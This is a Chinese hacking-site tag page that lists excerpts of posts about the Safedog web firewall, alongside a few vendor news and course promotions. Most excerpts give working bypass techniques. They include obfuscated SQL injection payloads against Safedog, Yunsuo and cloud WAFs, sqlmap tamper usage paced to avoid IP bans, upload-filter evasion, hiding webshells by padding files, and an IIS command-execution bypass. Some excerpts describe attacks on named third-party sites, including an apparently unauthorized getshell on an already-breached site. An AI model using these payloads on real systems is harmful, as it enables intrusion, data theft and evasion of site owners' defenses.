记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

安全狗携云工作负载安全产品矩阵亮相BCS 2019北京网络安全大会

2019北京网络安全大会(BCS 2019)今日(8月21日)在北京国家会议中心正式举行,本届大会以“聚合应变,内生安全”为主题,汇聚了来自全球30多个国家近400位行业领袖、产业精英,以及70多个全球知名安全研究机构和500家国内外知名企业。大会持续了21日-23日三天,涵盖了33场国际峰会、40场安全行业高端论坛、500多个演讲议题,涵盖了技术创新、产业发展、政策法规、解决方案等各类内容,其中云计算由于愈发广泛和深入应用的趋势,其安全受到了业内的重点关注。在大会的安全沙龙中,安全狗受邀参与,并分享了关于(云)主机安全的一些见解。“从云工作负载安全平台的技术要求来看,(云)主机的安全防护应当从过去以杀毒、漏洞补丁和加
发布时间:2019-08-29 18:10 | 阅读:20700 | 评论:0 | 标签:行业 安全狗

十九大召开:重大会议活动网络安保如何做好?

近年来针对政府网站的攻击日趋严重, 特别在重大活动期间更有可能发生突然的网络安全事件。 政府和重要单位、媒体的官方网站不仅承担着面向公众和国内外公布准确信息的责任,更是国家形象的一张名片,保证其安全的重要性不言而喻。十九大召开,重点单位受到网络攻击的风险骤然增加,面对此种情形,是否应该根据具体的情形制定一整套完整的网络应急方案,又如何做好政府和企业等众多重点单位的网络安保工作呢?1. 全面扫描 洞悉安全隐患孙子兵法里有一句话,叫“未战而庙算胜者,得算多也”,意思是说,在战争前筹划越充分,胜利的把握就越大。对于网络安保工作来说一样如此,对当前信息系统进行检查和监测,全面了解保护对象的安全形势和基本问题,对于后续制定网络安保方案开展安保工作有很重要的基础性作用。2. 实时监测 消弭风险于无形一般来说,受限于制度、技
发布时间:2017-10-22 09:30 | 阅读:252981 | 评论:0 | 标签:术有专攻 内容防篡改 安全狗 实时监测 网络安保

课程推荐|安全牛课堂厂商专区——安全狗

1. 安全运维工程师成长手册内容简介:企业对安全能力的需求,不只是在安全产品本身,运维人才也是不可或缺的一部分。而一线的安全运维攻城狮,更是要在激烈的“攻防对抗”中为企业的整体安全性做出保障。“识人面相”明确自生位置, 技术能力, 希望达到的高度。物以类聚, 人以群分,选对团队, 跟准人, 才能在这”恶劣”的环境中生存下去。渗透测试与漏洞挖掘安全运维工程师有别于运维工程师的最大差别就是拥有攻防技能 而依仗攻防对抗的思维来构建企业安全体系, 也是安全建设中不可或缺的一部分。安全监控与安全部署安全监控防御三要术, 可知, 可控, 可信. 安全部署从基线扫描开始, 配置安全, WEB安全, 部署策略, 架构风险, 你需要的不仅仅是标准, 还需要实实在在能落地的方法论。应急响应与资产巡检出来混得, 总要被黑的。被黑不可
发布时间:2017-08-10 01:05 | 阅读:95663 | 评论:0 | 标签:活动集中营 厂商专区 安全牛课堂 安全狗 服务器安全

云锁/安全狗注入bypass

http://www.safedog.cn/?id=123/*/#*/union/*/#*/select/*/#*/1,2,3/*/#*/from/*/#*/admin http://www.yunsuo.com.cn/?id=2/*/#*/union/*/#*/select/*/#*/id,username,password/*/#*/from/*/#*/admin 使用sqlmap进行注入时 遇上安全狗/云锁的时候,保存上面脚本为ian.py sqlmap.py -u”http://www.baidu.com” –tamper=ian.py –delay 2 delay 2 间隔两秒发送包这样保持不会被安全狗封ip  
发布时间:2017-02-03 06:10 | 阅读:482204 | 评论:0 | 标签:安全文章 注入 安全狗

网络安全之绕过安全狗上传拦截

前几天遇到个网站有安全狗,上传的时候老是被拦截,所以昨天本地搭建环境测试了下,测试结果如下:这里我首先得说下http协议:在http协议中以;号为结束某条语句,不找到;号,http协议是不会判断他结束的。这里我直接上传会被拦截 相信研究过安全狗,的都能认出来这是被拦截的界面吧然后我再filename这里进行换行 这里就成功的进行绕过了。
发布时间:2016-11-21 16:40 | 阅读:140876 | 评论:0 | 标签:安全狗

绕过安全狗写shell和隐藏后门大马

安全狗默认配置只检测数据前1024kb的内容。本地后门扫描也只扫描小于1024KB的文件可以在大马文件前面添加1M的数据,必须在前面,利用写的方式写入 php: fwrite(fopen('wooyun.php','w+'),(1M+大马); 这样是不会被检测到的。但上传就是时好时坏。饶过本地后门扫描无压力
发布时间:2016-08-13 12:40 | 阅读:106401 | 评论:0 | 标签:后门 安全狗

网站安全狗最新版SQL注入绕过

测试环境:code 区域Windows XP + php + Apache 2.4.10 + mysql1、版本2、尝试code 区域**.**.**.**/sql.php?id=-1/*!UNION ALL*//*!SELECT*/1,2,3被拦截难道是拦截union?select?还是关键字组合?以前安全狗版本还能看到正则,现在直接内置加密了。。。逆不出来了。然后fuzzing一个个测试3、绕过防护全开payload:code 区域**.**.**.**/sql.php?id=-1/*/*/UNION/*/*/SELECT/*/*/1,/*!USER*/(),uuid()code 区域**.**.**.**/sql.php?id=-1/*/*/UNION/*/*/SELECT/*/*/1,/*!da
发布时间:2016-07-12 21:15 | 阅读:155184 | 评论:0 | 标签:注入 安全狗

Bypass阿里云盾、百度云加速、安全宝、安全狗、云锁、360主机卫士SQL注入防御

Mysql在执行语句时,#注释将忽略掉"当前行"后面的所有语句,但是即使忽略了注释后面的语句,遇到换行的话还是会紧接注释之前的语句继续执行。再经过URL编码后为%23%0A 漏洞证明: 阿里云盾:Bypass:code 区域https://**.**.**.**/ask/3689?spm=5176.100241.0.0.eViKRY?id=1%20union%23%0Aselect%20user%20from%20ddd百度云加速:Bypass:安全宝:安全宝就比较有意思了,这个方法试了下不可行。再看看安全宝怎么检测的:只有union select不会被拦截。当union select后面加上查询字段的时候就会被拦截,所以可以不必在union与select之间使用这
发布时间:2016-07-08 09:55 | 阅读:106921 | 评论:0 | 标签:注入 安全狗

安全课堂直播:安全运维攻城狮“求生”手册

企业对安全能力的需求,不只是在安全产品本身,运维人才也是不可或缺的一部分。而一线的安全运维攻城狮,更是要在激烈的“攻防对抗”中为企业的整体安全性做出保障。此次安全牛在线技术讲座第九期,我们邀请到了安全狗攻防实验室和服云高级渗透测试团队的负责人黄登老师,带来题为“安全运维工程师‘求生’手册”的技术分享。讲座内容脉络“识人面相”:明确自生位置, 技术能力, 希望达到的高度.。物以类聚, 人以群分. 选对团队, 跟准人, 才能在这”恶劣”的环境中生存下去;渗透测试与漏洞挖掘:安全运维工程师有别于运维工程师的最大差别就是拥有攻防技能 而依仗攻防对抗的思维来构建企业安全体系, 也是安全建设中不可或缺的一部分;安全监控与安全部署:安全监控防御三要术, 可知, 可控, 可信. 安全部署从基线扫描开始, 配置安全, WEB安全
发布时间:2016-06-22 23:50 | 阅读:108314 | 评论:0 | 标签:活动集中营 2016年6月24日 安全狗 安全运维 黄登

网站安全狗(IIS版) 注入绕过

获取最新的SQL注入拦截规则存在注入漏洞的程序代码正常打开And 1=1 测试安全狗是否拦截主要是安全狗对/**a*/ 这种规则处理的不太好导致可以绕过执行任意的SQL 漏洞证明: 修复方案: 这个你们专业
发布时间:2016-06-07 17:55 | 阅读:90042 | 评论:0 | 标签:注入 安全狗

记一次过安全狗Getshell

还是上次的站但是被吧友轮奸之后人家装了安全狗然后很高兴的是账号密码依然没改,登录后台原来的上传点炸了,上传a.asp或者1.jpg全部遭到安全狗拦截翻了翻家里的白帽子黑客讲web安全发现可能是通过文件头判断的于是我自制了一个图片马把一句话插入到一个随意的图片中果然,成功上传通过数据库备份改为asp结果我打开一瞧不怕不怕,过狗刀来也 
发布时间:2016-06-04 17:55 | 阅读:110575 | 评论:0 | 标签:安全狗

你有牛X的技术?安全课堂等着你!

安全课堂(edu.aqniu.com)最早于2015年6月初正式上线,通过设计严谨的模式和完整的内容体系,为网络安全爱好者和从业人员提供安全相关的各领域和类别的精品在线课程。用户可以根据自身的水平和条件自主选择、调整学习时间和安排学习进度。安全课堂的内容涵盖了攻防实践、安全运维、脚本语言、安全基础、安全管理实践、安全认证、厂商产品、安全意识等类别,并从技术、产品、意识、管理等多个维度,为个人用户和企业用户提供一个实用、方便、性价比非常高的在线教育服务平台。5月20日,安全课堂与安全狗正式达成合作,将安全课堂的学习福利赠送给所有安全狗论坛的注册用户。合作形式上,所有在安全狗·服云上的注册用户,均可以通过预留邮箱地址获得一张安全课堂价值100元的代金券。拿到代金券并在安全课堂注册的同学,有近50余门诸如《DDoS攻
发布时间:2016-06-03 03:35 | 阅读:98737 | 评论:0 | 标签:活动集中营 行业动态 代金券 安全狗 安全课堂 教育服务

入侵检测之突破安全狗上传

帮人入侵检测一个站他说有安全狗上传不了那么看了一下 稍微研究一下发现之前我发的zone.****.org/content/21386 失效想着安全狗可能是修复了post中的空格忽略问题那么又研究了一些发现安全狗的拦截上传原理是:用户 - 网站(iis) - 安全狗那么怎么突破呢?有经验的tx 在截断上传的时候会看到类似于“-----------------------------30514443229777"的来分割字符串其实这些是multipart/form-data协议的分隔符 那么安全狗的原理是正则匹配到这东西 然后加以判断那么怎么突破?我们前面说了安全狗的拦截上传原理是:用户 - 网站(iis) - 安全狗 用户 - 发起请求 - 安全狗处理 - 网站返回请求 所以我们改一下mul
发布时间:2016-06-02 19:55 | 阅读:109356 | 评论:0 | 标签:安全狗

网站安全狗禁止IIS执行程序绕过

下图是一个c# 写的小马,可以执行任意命令打开网站安全狗开启禁止执行程序防护功能由于安全狗只支持 32位程序池 那我们网站设置程序池为32位打开小马,开始执行命令 ,果不其然的拒绝访问被安全狗拦截防护日志中也有拦截记录 看到安全狗的应用程序池中有白名单,这些白名单是**.**.**.** 的编译环境所以是不能禁止的。那我们想,如果启动的程序中包含白名单文件的路径,安全狗会怎么处理?为了不影响我们要执行的命令, 那么把安全狗中的白名单作为一个参数传入我们要启动的程序,下面就是见证奇迹的时刻了,测试通过!安全狗没任何反应!下面我们来修改我们的EXP ,将白名单的字符作为参数传入好啦!一个过狗exp就出来了,可以执行任意命令不会被拦截! 漏洞证明: 修复方案: 这个你们比
发布时间:2016-06-01 23:00 | 阅读:95339 | 评论:0 | 标签:安全狗

CCBN WWW主站SQL注入/sa权限(绕过安全狗/附sqlmap脚本)

中国国际广播电视信息网络展览会 主站:code 区域http://**.**.**.**bn.tv/介绍:http://**.**.**.**bn.tv/channels/4.html漏洞url:code 区域http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p参数:CustomerName可注入遇到狗:code 区域http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27) and 1=user--绕过:字段数:code 区域http://**.**.
发布时间:2016-06-01 07:40 | 阅读:83216 | 评论:0 | 标签:注入 安全狗

完美Bypass安全狗最新版(V3.5.12048)SQL注入防护规则(可UNION)

之前的Bypass安全狗是通过更新网马库的方式更新规则的Mysql UNION语法code 区域http://**.**.**.**/doc/refman/5.5/en/union.htmlSELECT ...UNION [ALL | DISTINCT] SELECT ...[UNION [ALL | DISTINCT] SELECT ...]上回提到了这个union allcode 区域http://**.**.**.**/bugs/wooyun-2016-0170433安全狗在过滤危险请求的时候两个敏感字段相邻就会被干掉,但是两个敏感字段中间"插入"点什么的话就不会被匹配到。distinct虽然没提到distinctrow但是也可以。 漏洞证明: code 区域
发布时间:2016-05-18 21:15 | 阅读:103769 | 评论:0 | 标签:注入 安全狗

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云